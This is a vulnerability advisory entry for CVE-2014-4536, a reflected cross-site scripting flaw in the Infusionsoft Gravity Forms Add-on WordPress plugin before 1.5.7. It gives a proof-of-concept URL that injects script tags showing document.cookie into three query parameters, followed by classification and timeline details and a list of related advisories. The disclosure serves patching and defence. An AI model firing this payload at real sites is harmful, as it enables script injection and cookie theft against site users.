Infusionsoft Gravity Forms Add-on < 1.5.7 – Unauthenticated Reflected XSS | CVE 2014-4536 | Plugin Vulnerabilities

Description

The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.

Proof of Concept

http://127.0.0.1/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

Affects Plugins

Fixed in 1.5.7

References

CVE

URL

https://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Verified

No

WPVDB ID

f048b5cc-5379-4c19-9a43-cd8c49c8129f

Timeline

Publicly Published

2014-04-25 (about 11 years ago)

Added

2019-12-28 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2024-12-13

Title

Filestack Official < 3.0.0 - Reflected Cross-Site Scripting

Published

2025-02-10

Title

WP Foodbakery <= 4.8 - Reflected Cross-Site Scripting

Published

2025-04-25

Title

Libro de Reclamaciones <= 1.0.1 - Reflected Cross-Site Scripting

Published

2024-07-17

Title

Smart Post Show <= 3.0.0 - Editor+ Stored XSS

Published

2024-04-15

Title

Shortcodes and extra features for Phlox theme < 2.15.8 - Contributor+ Stored XSS via aux_gmaps Shortcode